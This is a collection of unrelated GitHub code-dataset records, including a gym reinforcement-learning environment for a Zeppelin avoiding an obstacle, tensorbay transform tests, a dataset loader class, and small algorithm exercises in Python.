+{"seq_id":"5253511196","text":"RESOURCES_PATH = \"Resources/\"\nPATH_TO_VIDEO = \"\"\nPATH_TO_MODEL = RESOURCES_PATH + \"haarcascade_frontalface_default.xml\"\nPATH_TO_EMODEL = RESOURCES_PATH + \"datasets/Models/FINAL\"\nSOURCE = \"VIDEO\"\nJSON_PATH_PRE = \"jsonFiles/PreProcessResults.json\"\nJSON_PATH_POS = \"jsonFiles/PostProcessResults.json\"\nJSON_PATH_TEMP = \"jsonFiles/PreviewTMP.json\"\nPATH_TO_JSON_PRE = RESOURCES_PATH + JSON_PATH_PRE\nPATH_TO_JSON_POS = RESOURCES_PATH + JSON_PATH_POS\nPATH_TO_JSON_TEMP = RESOURCES_PATH + JSON_PATH_TEMP\nVIDEO_PREVIEW_POS = True\nVIDEO_PREVIEW_PRE = True\nDATA_DIRECTORY = RESOURCES_PATH + \"datasets/train\"\nMODEL_DIRECTORY = RESOURCES_PATH + \"datasets/Models\"\nEMOTION_MODEL = MODEL_DIRECTORY + \"/AIWakeModel.h5\"\nIMG_SIZE_PROC = 224 #Imagenet -> 224x224 FER-2013\nVIDEO_LENGHT = 0\nRATIO = 0.4\nPROP = 0.25\nDETAILED = True\nSHOW_HB = True\nTHREAD_POOL_SIZE = 4\nLOG = \"\"\nIMG_KEY = \"\"\nSELECTED_FACE = -1\nPROCESSED_FACES = 0\nSELECTED_FRAME = -1\nVIDEO_SPEED = 1\nSELECTED_SPEED = 1\n","repo_name":"Kirkuss/TFG","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"29564066085","text":"import numpy as np\nimport pytest\nfrom quaternion import quaternion\n\nfrom tensorbay.geometry import Transform3D, Vector3D\n\n_DATA_TRANSFORM = {\n \"translation\": {\"x\": 1.0, \"y\": 2.0, \"z\": 3.0},\n \"rotation\": {\"w\": 1.0, \"x\": 0.0, \"y\": 0.0, \"z\": 0.0},\n}\n\n\nclass TestTransform3D:\n def test_init(self):\n sequence = [[1, 0, 0, 1], [0, 1, 0, 1]]\n with pytest.raises(ValueError):\n Transform3D(matrix=sequence)\n\n transform = Transform3D()\n assert transform.translation == Vector3D(0.0, 0.0, 0.0)\n assert transform.rotation == quaternion(1.0, 0.0, 0.0, 0.0)\n\n sequence = [[1, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]\n transform = Transform3D(matrix=sequence)\n assert transform.translation == Vector3D(1, 1, 1)\n assert transform.rotation == quaternion(1.0, -0.0, -0.0, -0.0)\n\n numpy = np.array(sequence)\n transform = Transform3D(matrix=numpy)\n assert transform.translation == Vector3D(1, 1, 1)\n assert transform.rotation == quaternion(1.0, -0.0, -0.0, -0.0)\n\n transform = Transform3D([1, 2, 3], [1, 0, 0, 0])\n assert transform.translation == Vector3D(1, 2, 3)\n assert transform.rotation == quaternion(1.0, 0.0, 0.0, 0.0)\n\n def test_eq(self):\n transform_1 = Transform3D([1, 2, 3], [1, 0, 0, 0])\n transform_2 = Transform3D([1, 2, 3], [1, 0, 0, 0])\n transform_3 = Transform3D([1, 1, 1], [1, 0, 0, 0])\n assert (transform_1 == transform_2) == True\n assert (transform_1 == transform_3) == False\n\n def test_mul(self):\n sequence_1 = [1, 1, 1]\n sequence_2 = [[1, 2, 3], [4, 5, 6]]\n sequence_3 = [\"a\", \"b\", \"c\"]\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n transform_2 = Transform3D([2, 0, 0], [-1, 0, 0, 0])\n transform_3 = Transform3D([1, 2, 3], [-1, 0, 0, 0])\n\n assert transform_1 * transform_1 == transform_2\n assert transform_1 * quaternion_1 == transform_3\n assert transform_1 * sequence_1 == Vector3D(2.0, 1.0, 2.0)\n assert transform_1 * np.array(sequence_1) == Vector3D(2.0, 1.0, 2.0)\n\n assert transform_1.__mul__(1) == NotImplemented\n assert transform_1.__mul__(sequence_2) == NotImplemented\n assert transform_1.__mul__(np.array(sequence_2)) == NotImplemented\n assert transform_1.__mul__(sequence_3) == NotImplemented\n\n def test_rmul(self):\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n transform_2 = Transform3D([1, -2, -3], [-1, 0, 0, 0])\n transform_3 = Transform3D([\"a\", \"b\", \"c\"], [-1, 0, 0, 0])\n\n with pytest.raises(TypeError):\n 1 * transform_1\n assert quaternion_1 * transform_1 == transform_2\n assert transform_3.__rmul__(quaternion_1) == NotImplemented\n\n def test_create(self):\n transform = Transform3D([1, 2, 3], [0, 1, 0, 0])\n assert Transform3D._create(Vector3D(1, 2, 3), quaternion(0, 1, 0, 0)) == transform\n\n def test_mul_vector(self):\n sequence_1 = [1, 1, 1]\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n\n with pytest.raises(ValueError):\n transform_1._mul_vector(1)\n with pytest.raises(TypeError):\n transform_1._mul_vector(transform_1)\n with pytest.raises(ValueError):\n transform_1._mul_vector(quaternion_1)\n\n assert transform_1._mul_vector(sequence_1) == Vector3D(2.0, 1.0, 2.0)\n assert transform_1._mul_vector(np.array(sequence_1)) == Vector3D(2.0, 1.0, 2.0)\n\n def test_loads(self):\n transform = Transform3D.loads(_DATA_TRANSFORM)\n assert transform.translation == Vector3D(1.0, 2.0, 3.0)\n assert transform.rotation == quaternion(1.0, 0.0, 0.0, 0.0)\n\n def test_dumps(self):\n transform = Transform3D([1, 2, 3], [1, 0, 0, 0])\n assert transform.dumps() == _DATA_TRANSFORM\n\n def test_set_translation(self):\n transform = Transform3D()\n\n transform.set_translation(1, 2, 3)\n assert transform.translation == Vector3D(1, 2, 3)\n transform.set_translation(x=3, y=4, z=5)\n assert transform.translation == Vector3D(3, 4, 5)\n\n def test_set_rotation(self):\n transform = Transform3D()\n\n transform.set_rotation(0, 1, 0, 0)\n assert transform.rotation == quaternion(0, 1, 0, 0)\n\n quaternion_1 = quaternion(0, 1, 0, 0)\n transform.set_rotation(quaternion=quaternion_1)\n assert transform.rotation == quaternion_1\n\n with pytest.raises(TypeError):\n transform.set_rotation([0, 1, 0, 0])\n\n def test_as_matrix(self):\n matrix = np.array([[1, 0, 0, 1], [0, -1, 0, 2], [0, 0, -1, 3], [0, 0, 0, 1]])\n transform = Transform3D([1, 2, 3], [0, 1, 0, 0])\n np.testing.assert_array_equal(transform.as_matrix(), matrix)\n\n def test_inverse(self):\n transform_1 = Transform3D([1, 2, 3], [0, 1, 0, 0])\n transform_2 = Transform3D([-1, 2, 3], [0, -1, 0, 0])\n assert transform_1.inverse() == transform_2\n","repo_name":"Graviti-AI/tensorbay-python-sdk","sub_path":"tensorbay/geometry/tests/test_transform.py","file_name":"test_transform.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"2"}
+{"seq_id":"40064618274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 17:27:36 2019\n\n@author: Thangarajan\n\"\"\"\n\ndf1 = df[['Site_Code','CarpetArea']]\ndf_grp = df1.groupby(['Site_Code'], as_index=False).mean()\ndf1.describe(include='all')\nimport pandas as pd\npd.get_dummies(df['Site_Code'])\n","repo_name":"thangarajan8/misc_python","sub_path":"sessions/untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33375449166","text":"import logging\nimport math\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\nimport numpy as np\nimport random\nimport polytope as pc\n\nfrom polytope.solvers import lpsolve\ndef cheby_ball(poly1):\n #logger.debug('cheby ball')\n if (poly1._chebXc is not None) and (poly1._chebR is not None):\n # In case chebyshev ball already calculated and stored\n return poly1._chebR, poly1._chebXc\n if isinstance(poly1, pc.Region):\n maxr = 0\n maxx = None\n for poly in poly1.list_poly:\n rc, xc = cheby_ball(poly)\n if rc > maxr:\n maxr = rc\n maxx = xc\n poly1._chebXc = maxx\n poly1._chebR = maxr\n return maxr, maxx\n if pc.is_empty(poly1):\n return 0, None\n # `poly1` is nonempty\n r = 0\n xc = None\n A = poly1.A\n c = np.negative(np.r_[np.zeros(np.shape(A)[1]), 1])\n norm2 = np.sqrt(np.sum(A * A, axis=1))\n G = np.c_[A, norm2]\n h = poly1.b\n sol = lpsolve(c, G, h)\n #return sol\n if sol['status'] == 0 or (sol['status'] == 4 and pc.is_inside(poly1,sol['x'][0:-1])):\n r = sol['x'][-1]\n if r < 0:\n return 0, None\n xc = sol['x'][0:-1]\n else:\n # Polytope is empty\n poly1 = pc.Polytope(fulldim=False)\n return 0, None\n poly1._chebXc = np.array(xc)\n poly1._chebR = np.double(r)\n return poly1._chebR, poly1._chebXc\n\n\nlogger = logging.getLogger(__name__)\n\nclass ZeppelinEnv(gym.Env):\n \"\"\"\n Agent is navigating a Zeppelin flying in the wind.\n The wind is composed of a wind field and a sudden turbulence.\n In particular, the agent is navigating near an obstacle which the agent must avoid.\n The goal of the agent is to leave the obstacle region.\n \"\"\"\n\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second' : 60\n }\n\n def is_crash(self, some_state):\n x1 = some_state[0]\n x2 = some_state[1]\n c = some_state[2]\n return (-c < x1 and x1 < c) and (-c < x2 and x2 < c)\n \n def x1_min(self, state):\n x2 = state[1]\n c = state[2]\n w = state[3]\n return -(self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE) + ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - (x2 - self.TIME_STEP * (self.MAX_TURBULENCE + self.MAX_VELOCITY+w))) + c) )\n\n def x1_max(self, state):\n x2 = state[1]\n c = state[2]\n w = state[3]\n return self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE) + ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - (x2 - self.TIME_STEP * (self.MAX_TURBULENCE + self.MAX_VELOCITY+w))) + c)\n \n def x2_max(self, state):\n c = state[2]\n w = state[3]\n return c + w / (self.MAX_VELOCITY - self.MAX_TURBULENCE) * c + self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE + w)\n \n def x2_min(self, state):\n c = state[2]\n return -c - self.TIME_STEP * (self.MAX_VELOCITY + self.MAX_TURBULENCE)\n\n def reached_goal(self, state):\n # Goal is to leave obstacle region, i.e. achieve:\n # x2 < -c2 - T * (p + r) |\n # x2 > c2 + w / (p - r) * c1 + T * (p + r + w) |\n # -x1 - T * (p + r) - ((p - r) / w * (c2 - (x2 - T * (r + p + w))) + c1) >= 0 |\n # x1 - T * (p + r) - ((p - r) / w * (c2 - (x2 - T * (r + p + w))) + c1) >= 0\n x1 = state[0]\n x2 = state[1]\n return (x2 < self.x2_min(state) ) or \\\n (x2 > self.x2_max(state) ) or \\\n ( x1 <= self.x1_min(state)) or \\\n ( x1 >= self.x1_max(state) )\n\n def __init__(self):\n # Makes the continuous fragment of the system determinitic by fixing the\n # amount of time that the ODE evolves.\n self.TIME_STEP = 0.5\n\n self.MIN_WIND_SPEED = 1.0\n self.MAX_WIND_SPEED = 30 # m/s in ~ 100 km/h\n self.MAX_TURBULENCE = 15 # m/s in ~ 54 km/h\n self.MAX_VELOCITY = 20 # m/s in ~ 72 km/h\n\n self.INCLUDE_UNWINNABLE=True\n\n self.FUEL_RESTRAINT = True\n self.REWARD_SCALE = 1e-1\n self.OBSTACLE_REWARD = -200.\n self.NO_FUEL_REWARD = -50.\n # done reward = (FUEL_RESTRAINT) ? r+fuel*r : 2*r\n self.DONE_REWARD = 100.\n self.TIME_STEP_REWARD = self.REWARD_SCALE\n\n self.MODEL_RESET_SHARE = 1.0\n self.POLYTOPES = None\n self.POLYTOPE_VOLUMES = None\n\n assert self.MAX_VELOCITY < self.MAX_TURBULENCE+self.MAX_WIND_SPEED\n assert self.MAX_TURBULENCE < self.MAX_VELOCITY\n\n self.MAX_X = 400 # m\n self.MIN_X = -400 # m\n self.MAX_Y = 400 # m\n self.MIN_Y = -400 # m\n\n self.WORST_CASE_TURBULENCE=False\n\n # self.MIN_C = 20 # m\n # self.MAX_C = 40 # m\n self.MIN_C = 10 # m\n self.MAX_C = 80 # m\n\n self.RENDER_ZEPPELIN_RADIUS=10\n \n # Action Space:\n # - Speed \\mu \\in [-1.0, 1.0]\n # - Direction y1* \\in [-1.0, 1.0]\n # y2* direction is computed implicitly through y2 = sqrt(1-y1*^2)\n # Final velocity comptued through \\mu*(y1*,y2*)\n action_low = np.array([-1.0, -1.0])\n action_high = np.array([1.0, 1.0])\n self.action_space = spaces.Box(action_low, action_high)\n\n # Observation Space:\n # - Position x1 \\in [MIN_X, MAX_X]\n # - Position x2 \\in [MIN_Y, MAX_Y]\n # - Obstacle radius c \\in [MIN_C, MAX_C]\n # - Wind strength w \\in [MIN_WIND_SPEED, MAX_WIND_SPEED]\n obs_low = np.array([\n self.MIN_X,\n self.MIN_Y,\n self.MIN_C,\n self.MIN_WIND_SPEED\n ])\n obs_high = np.array([\n self.MAX_X,\n self.MAX_Y,\n self.MAX_C,\n self.MAX_WIND_SPEED\n ])\n self.observation_space = spaces.Box(obs_low, obs_high)\n\n self._seed()\n self.viewer = None\n self.state = None\n\n self.steps_beyond_done = None\n\n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def _step(self, action):\n return self._stepByModel(action)\n\n def _stepByModel(self, action):\n assert self.action_space.contains(action), \"%s (of type %s) invalid\" % (str(action), type(action))\n state = self.state\n\n # Compute turbulence\n z1 = 0.\n z2 = -1.\n if self.WORST_CASE_TURBULENCE:\n z1, z2 = self.get_worst_turbulence(self.state)\n else:\n z1_norm = self.np_random.uniform(low=-1.0, high=1.0, size=(1,))[0]\n z2_norm = np.sqrt(1-z1_norm**2)\n turbulence_strength = self.np_random.triangular(-self.MAX_TURBULENCE, 0.0 ,self.MAX_TURBULENCE, size=(1,))[0]\n z1 = z1_norm * turbulence_strength\n z2 = z2_norm * turbulence_strength\n\n x1 = state[0]\n x2 = state[1]\n c = state[2]\n w = state[3]\n\n self.steps+=1\n\n t = self.TIME_STEP\n \n y_strength = np.clip(action[0], -1.0, 1.0)*self.MAX_VELOCITY\n y1_norm = np.clip(action[1], -1.0, 1.0)\n y2_norm = np.sqrt(1.01-0.9999*y1_norm**2) # numerical safeguard against negative sqrt\n y1 = 0.999949*y1_norm * y_strength\n y2 = y2_norm * y_strength\n\n x1_new = x1 + t*( y1 + z1 )\n x2_new = x2 + t*( y2 + z2 - w )\n \n self.state = (x1_new, x2_new, c, w)\n\n has_crashed = self.is_crash(self.state)\n reached_goal = self.reached_goal(self.state)\n done = has_crashed or reached_goal\n done = bool(done)\n\n # Imaginary fuel -> try to work as fast as possible\n fuel = 1-float(self.steps)/800.0\n\n if has_crashed:\n # Penalize for crashing\n reward = self.OBSTACLE_REWARD\n elif reached_goal:\n # Base reward + reward dependent on efficiency\n if self.FUEL_RESTRAINT:\n reward = self.DONE_REWARD + fuel*self.DONE_REWARD\n else:\n reward = 2*self.DONE_REWARD\n elif fuel == 0 and self.FUEL_RESTRAINT:\n # Do not run out of fuel\n reward = self.NO_FUEL_REWARD\n else:\n # Reward for not having crashed yet,\n # but dependent on efficiency\n reward = fuel * self.TIME_STEP_REWARD\n\n return np.array(self.state), reward, done, {'crash': has_crashed, 'goal': reached_goal}\n \n def is_in_bounds(self, state):\n w = state[3]\n c = state[2]\n x1 = state[0]\n x2 = state[1]\n intermediate_state1 = (None, None, c, w)\n if x2 < self.x2_min(intermediate_state1) or x2 > self.x2_max(intermediate_state1):\n #print(\"o\", end=\"\")\n return False\n intermediate_state2 = (None, x2, c, w)\n if x1 < self.x1_min(intermediate_state2) or x1 > self.x1_max(intermediate_state2):\n #print(\"o\", end=\"\")\n return False\n return True\n\n def random_reset(self):\n epsilon = 0.1\n w = self.np_random.uniform(low=(self.MAX_VELOCITY-self.MAX_TURBULENCE+epsilon), high=self.MAX_WIND_SPEED, size=(1,))[0]\n c = self.np_random.uniform(low=self.MIN_C, high=self.MAX_C, size=(1,))[0]\n intermediate_state1 = (None, None, c, w)\n x2 = self.np_random.uniform(low=self.x2_min(intermediate_state1), high=self.x2_max(intermediate_state1), size=(1,))[0]\n intermediate_state2 = (None, x2, c, w)\n x1 = self.np_random.uniform(low=self.x1_min(intermediate_state2), high=self.x1_max(intermediate_state2), size=(1,))[0]\n\n self.state = (x1,x2,c,w)\n \n return np.array(self.state)\n\n def exclude_because_unwinnable(self, state):\n \"\"\"\n Returns True if state should be included, because setup is unwinnable (i.e. inside Bermuda triangle)\n \"\"\"\n if self.INCLUDE_UNWINNABLE:\n return False\n x1 = state[0]\n x2 = state[1]\n c = state[2]\n w = state[3]\n x2_min = -c\n x2_max = (c + w / (self.MAX_VELOCITY - self.MAX_TURBULENCE) * c)\n x1_min = (- ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n x1_max = ( ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n if x1 > x1_min and x1 < x1_max and x2 > x2_min and x2 < x2_max:\n return True\n # If not above/below and not in bermuda triangle, we are out of danger\n return False\n \n def get_worst_turbulence(self, state):\n x1 = state[0]\n x2 = state[1]\n c = state[2]\n w = state[3]\n x2_min = -c\n x2_max = (c + w / (self.MAX_VELOCITY - self.MAX_TURBULENCE) * c)\n x1_min = (- ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n #x1_max = ( ((self.MAX_VELOCITY - self.MAX_TURBULENCE) / w * (c - x2) + c))\n gamma = self.MAX_TURBULENCE/np.sqrt(w**2+(self.MAX_VELOCITY - self.MAX_TURBULENCE)**2)\n if x2 <= x2_min:\n return 0., self.MAX_TURBULENCE\n elif x2 >= x2_max:\n return 0., -self.MAX_TURBULENCE\n elif x1 <= x1_min:\n return gamma*w, -gamma*(self.MAX_VELOCITY - self.MAX_TURBULENCE)\n else: # Assume x1 >= x1_max:\n return -gamma*w, -gamma*(self.MAX_VELOCITY - self.MAX_TURBULENCE)\n \n def model_reset(self):\n #print(\"m\")\n while True:\n res = self.random_reset()\n if not self.is_crash(res) and not self.reached_goal(res) and not self.exclude_because_unwinnable(res):\n rv = res\n break\n return rv\n \n def _reset(self):\n self.steps = 0\n r = self.np_random.uniform(low=0.0, high=1.0, size=(1,))[0]\n if r <= self.MODEL_RESET_SHARE:\n return self.model_reset()\n else:\n return self.polytope_reset()\n \n def init_polytopes(self, model_share, polytopes):\n self.MODEL_RESET_SHARE = model_share\n volume = []\n for p in polytopes:\n volume.append(pc.volume(p))\n total_volume = sum(volume)\n \n self.POLYTOPE_VOLUMES = [0]\n for v in volume:\n self.POLYTOPE_VOLUMES.append((self.POLYTOPE_VOLUMES[-1]*total_volume + v)/total_volume)\n self.POLYTOPES = []\n for p in polytopes:\n cheby_ball(p)\n self.POLYTOPES.append(p)\n\n def sample_from_poly(self):\n while True:\n #print(\">\", end=\"\")\n r = self.np_random.uniform(low=0.0, high=1.0, size=(1,))[0]\n poly = self.POLYTOPES[-1]\n # TODO(steuber): Could be more efficient through binary search\n for i in range(len(self.POLYTOPE_VOLUMES)):\n if r > self.POLYTOPE_VOLUMES[i]:\n poly = self.POLYTOPES[i-1]\n l_b, u_b = poly.bounding_box\n l_b = l_b.flatten()\n u_b = u_b.flatten()\n x = None\n n = poly.A.shape[1]\n for i in range(400):\n #print(\".\", end=\"\")\n x = self.np_random.uniform(low=l_b,high=u_b,size=(n,))\n if x in poly:\n break\n # Fallback if random sampling doesn't work\n if x is None:\n x = poly.chebXc\n # Fallback if polytope looks empty\n if x is None:\n continue\n return x\n \n def polytope_reset(self):\n while True:\n #print(\"|\",end=\"\")\n res = self.sample_from_poly()\n if not self.is_crash(res) and not self.reached_goal(res) and self.is_in_bounds(res) and not self.exclude_because_unwinnable(res):\n self.state = res\n rv = res\n break\n #print(\"\")\n return rv\n\n\n\n\n def _render(self, mode='human', close=False):\n if close:\n if self.viewer is not None:\n self.viewer.close()\n self.viewer = None\n return\n\n screen_width = 800\n screen_height = 800\n\n world_size_x = self.MAX_X - self.MIN_X\n world_size_y = self.MAX_Y - self.MIN_Y\n world_offset_x = -self.MIN_X\n world_offset_y = -self.MIN_Y\n scale_x = screen_width/world_size_x\n scale_y = screen_height/world_size_y\n from gym.envs.classic_control import rendering\n if self.viewer is None:\n self.viewer = rendering.Viewer(screen_width, screen_height)\n\n # Obstacle Circle\n obstacle = rendering.make_polygon([(-0.5,0.5),(0.5,0.5),(0.5,-0.5),(-0.5,-0.5)])\n obstacle.set_color(1.0, 0.0, 0.0)\n self.obstacletrans = rendering.Transform()\n obstacle.add_attr(self.obstacletrans)\n self.viewer.add_geom(obstacle)\n self.obstacletrans.set_translation(world_offset_x*scale_x, world_offset_y*scale_y)\n\n # Zeppelin\n zeppelin = rendering.make_circle(self.RENDER_ZEPPELIN_RADIUS*scale_x)\n zeppelin.set_color(0.0, 1.0, 1.0)\n self.zeppelintrans = rendering.Transform()\n zeppelin.add_attr(self.zeppelintrans)\n self.viewer.add_geom(zeppelin)\n\n if self.state is None: return None\n c=self.state[2]\n w=self.state[3]\n\n # Set Obstacle Size\n self.obstacletrans.set_scale(2*c*scale_x,2*c*scale_y)\n\n # Set Zeppelin Position:\n x1 = float(self.state[0]+world_offset_x) * scale_x\n x2 = float(self.state[1]+world_offset_y) * scale_y\n\n # Create Obstacle Region\n x2_1 = self.x2_min(self.state)\n x2_2 = self.x2_max(self.state)\n\n x1_11 = scale_x*self.x1_min((None,x2_1,c,w))+world_offset_x\n x1_12 = scale_x*self.x1_max((None,x2_1,c,w))+world_offset_x\n x1_21 = scale_x*self.x1_min((None,x2_2,c,w))+world_offset_x\n x1_22 = scale_x*self.x1_max((None,x2_2,c,w))+world_offset_x\n x2_1 = scale_y*x2_1+world_offset_y\n x2_2 = scale_y*x2_2+world_offset_y\n o_region = rendering.make_polygon([(x1_11,x2_1),(x1_12,x2_1),(x1_22,x2_2),(x1_21,x2_2),(x1_11,x2_1)],filled=False)\n self.viewer.add_onetime(o_region)\n\n\n self.zeppelintrans.set_translation(x1, x2)\n\n return self.viewer.render(return_rgb_array = mode=='rgb_array')\n\ngym.register(\n id='zeppelin-v3',\n entry_point=ZeppelinEnv,\n max_episode_steps=800, # todo edit\n reward_threshold=400.0, # todo edit\n )","repo_name":"samysweb/NCubeV","sub_path":"experiments/zeppelin/training/zeppelin_gym/env3.py","file_name":"env3.py","file_ext":"py","file_size_in_byte":16347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"16171812405","text":"\nfrom collections import deque\n\n\ndef solution(n, edge):\n \n answer = 0\n edge.sort(key = lambda x:x[0])\n print(edge)\n q = deque()\n length_list = [0] * (n+1)\n graph = [[] for i in range(n+1)]\n\n print(graph)\n for e in edge: # 양방향이므로 \n graph[e[0]].append(e[1])\n graph[e[1]].append(e[0])\n print(graph)\n \n q.append(1)\n length_list[1] = 1\n\n\n while q:\n now = q.popleft()\n for idx in graph[now]:\n if length_list[idx] == 0:\n q.append(idx)\n length_list[idx] = length_list[now] + 1\n\n\n max_length = max(length_list)\n for c in length_list:\n if c == max_length:\n answer += 1\n\n\n return answer\n\n\n\n\n\n\nprint(solution(6, [[3, 6], [4, 3], [3, 2], [1, 3], [1, 2], [2, 4], [5, 2]]))\n\n# 채점을 시작합니다.\n# 정확성 테스트\n# 테스트 1 〉\t통과 (0.02ms, 10.3MB)\n# 테스트 2 〉\t통과 (0.02ms, 10.3MB)\n# 테스트 3 〉\t통과 (0.03ms, 10.3MB)\n# 테스트 4 〉\t통과 (0.25ms, 10.3MB)\n# 테스트 5 〉\t통과 (0.97ms, 10.5MB)\n# 테스트 6 〉\t통과 (2.85ms, 11MB)\n# 테스트 7 〉\t통과 (26.62ms, 16.8MB)\n# 테스트 8 〉\t통과 (38.21ms, 20.3MB)\n# 테스트 9 〉\t통과 (37.47ms, 19.9MB)\n# 채점 결과\n# 정확성: 100.0\n# 합계: 100.0 / 100.0 11","repo_name":"DoubleJONY/KDJ-algorithm-challenge","sub_path":"owen/graph/graph_p1.py","file_name":"graph_p1.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"30743464219","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n count = [0 for _ in range(len(s) + 1)]\n count[-1] = 1\n count[-2] = 0 if s[-1] == '0' else 1\n for i in range(len(s)-2, -1, -1):\n if s[i] == '0':\n continue\n count[i] = count[i+1] + count[i+2] if int(s[i:i+2])<27 else count[i+1]\n return count[0]\n","repo_name":"ShengYg/algorithms","sub_path":"Leetcode/091 Decode Ways.py","file_name":"091 Decode Ways.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"42721149209","text":"import sys\r\nlist1=[12,15,19,21,4,6]\r\nl2=list1[3:5]\r\n# l2[0]=12\r\nprint(list1,l2)\r\n# print('size of two lists are {} and {}'.format(sys.getsizeof(list1),sys.getsizeof(l2)))\r\nn=12\r\nl=[]\r\nfor i in range(n):\r\n a=len(l)\r\n b=sys.getsizeof(l)\r\n\r\n print('the length is {0:3d},the bytes are {1:4d}'.format(a,b))\r\n l.append(i)","repo_name":"weifo/interview_preps","sub_path":"algorithms/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70875434926","text":"\"\"\"\nCore data module\n\"\"\"\nimport json\nfrom pathlib import Path\nfrom typing import List, Union\n\nimport pandas as pd\nfrom datasets import Dataset as HuggingfaceDataset\nfrom indodb.exception import DataFormatNotAllowed\n\n# Allowed datatype to be converted\nTO_ALLOWED_ALL = [\"labelled_dataset\"] # Allowed in every format\nTO_ALLOWED_PANDAS: List[str] = [] # allowed to be converted to pandas\nTO_ALLOWED_HF_DATASET: List[str] = [] # allowed to be converted to hf dataset\n\n\nclass IDataset:\n \"\"\"\n IDataset class\n \"\"\"\n\n def __init__(\n self, data_id: str, data_segment: str, data_dir: Union[str, Path]\n ) -> None:\n \"\"\"\n IDataset is a class that prepare data to be used to some format\n such as Pandas, Vaex, and huggingface datasets.\n\n Use to_(x) (`pandas`) to export the data to pandas\n\n\n Parameters\n ----------\n data_id : str\n Data identifier according to the database\n data_segment : str\n Segment of the data.\n data_dir : str\n Data directory of your cache database\n \"\"\"\n self.data_id = data_id\n self.data_segment = data_segment\n self.data_path = Path(data_dir) / data_id\n\n self.parquet_file = self.data_path / f\"{data_segment}.parquet\"\n if not self.parquet_file.is_file():\n raise FileNotFoundError(f\"File {self.parquet_file} is not found!\")\n with open(self.data_path / \"metadata.json\", \"r+\", encoding=\"utf-8\") as file:\n self.metadata = json.load(file)[\"data\"]\n\n def to_pandas(self) -> pd.DataFrame:\n \"\"\"\n Export the data into pandas format\n \"\"\"\n if self.metadata.get(self.data_segment).get(\"datatype\") in TO_ALLOWED_ALL:\n parq_df = pd.read_parquet(self.parquet_file)\n else:\n raise DataFormatNotAllowed(\n f\"{self.data_id} is not allowed to be used in Pandas format.\"\n )\n return parq_df\n\n def to_hf_datasets(self) -> HuggingfaceDataset:\n \"\"\"\n Export the data into huggingface datasets\n \"\"\"\n if self.metadata.get(self.data_segment).get(\"datatype\") in TO_ALLOWED_ALL:\n parq_data: HuggingfaceDataset = HuggingfaceDataset.from_parquet(\n str(self.parquet_file)\n )\n else:\n raise DataFormatNotAllowed(\n f\"{self.data_id} is not allowed to be used in\"\n \"huggingface dataset format.\"\n )\n return parq_data\n","repo_name":"haryoa/indodb","sub_path":"indodb/data_core/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"72956611885","text":"from numpy import arange\r\nimport matplotlib.pyplot as plt\r\n\r\n# #ciljna funkcija\r\n# def objective(x):\r\n# #return (4/3)*(x1[0]**2.0+x2[0]**2.0-x1[0]*x2[0])**0.75+x3[0];\r\n# return x[0]**2.0;\r\n#\r\n# #opseg ciljne funkcije\r\n# rmin,rmax = -2.0,2.0;\r\n# inputs = arange(rmin,rmax,1.0);\r\n# #izracunati ciljeve\r\n# results = [objective([x]) for x in inputs]\r\n# #iscrtavanje\r\n# plt.plot(inputs,results);\r\n# x_opt = 0.0;\r\n# plt.axvline(x = x_opt,ls =\"--\",color = \"red\");\r\n# plt.show()\r\n\r\nn = 100;\r\ninit_tk = 10;\r\nn = [i for i in range(n)];\r\ntemperatures = [init_tk/float(i+1) for i in n];\r\nplt.plot(n,temperatures);\r\nplt.xlabel(\"Iteracije\");\r\nplt.ylabel(\"Temperature\");\r\nplt.show();\r\n","repo_name":"djordjemaljkovic/vi","sub_path":"VI/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
